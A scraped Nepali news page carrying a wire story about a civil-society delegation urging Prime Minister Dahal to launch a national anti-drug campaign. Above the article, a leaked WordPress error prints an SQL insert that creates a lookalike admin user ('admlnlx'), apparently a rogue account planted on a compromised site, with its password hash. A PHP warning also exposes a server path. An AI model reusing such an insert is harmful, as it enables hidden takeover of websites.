WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BpinTQVw3I7LoT4dX19OmvLRELaZwO0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 16:07:46', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
प्रधानमन्त्रीसँग लागुऔषध रोकथामका लागि राष्ट्रिय अभियान घोषणा गर्न माग – Gaule Khabar

प्रधानमन्त्रीसँग लागुऔषध रोकथामका लागि राष्ट्रिय अभियान घोषणा गर्न माग

प्रधानमन्त्रीसँग लागुऔषध रोकथामका लागि राष्ट्रिय अभियान घोषणा गर्न माग

काठमाडौँ, माघ २६ –

मानवअधिकार तथा शान्ति समाजको प्रतिनिधिमण्डलले आज प्रधानमन्त्री पुष्पकमल दाहाललाई भेटी लागुऔषध तथा मदिरा दुव्र्यसन रोकथामका लागि राष्ट्रिय अभियान घोषणा गर्न आग्रह गरेको छ ।

प्रधानमन्त्री दाहालले दुव्र्यसन नियन्त्रणका लागि कार्ययोजनाले सकारात्मक भूमिका निर्वाह गर्ने विश्वास व्यक्त गर्दै समाजले दिएका सुझावलाई सरकारले कार्यान्वयन गर्ने बताउनुभएको समाजका अध्यक्ष गङ्गाधर अधिकारीले बताउनुभयो ।

अध्यक्ष अधिकारीले लागुऔषध तथा मदिरा दुव्र्यसनले महामारीको रुप लिन लागिरहेकाले यसको अगाडि नै रोकथामका लागि राष्ट्रिय कार्ययोजना तयार पार्नुपर्ने बताउनुभयो ।

समाजले प्रधानमन्त्रीको अध्यक्षतामा आगुऔषध मदिरा दुव्र्यसनी रोकथामको उद्देश्यसहित विशेष निकाय गठन गर्न पनि आग्रह गरेको छ ।

प्रधानमन्त्रीसँगको भेटमा समाजका संस्थापक सभापति कृष्ण पहाडी, सभापति गङ्गाधर अधिकारी, संस्थापक सदस्य कृष्ण कँडेल, उपसभापति रेनुका पौडेल र महासचिव उत्तम पुडासैनीसहभागी हुुनुहुन्थ्यो । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका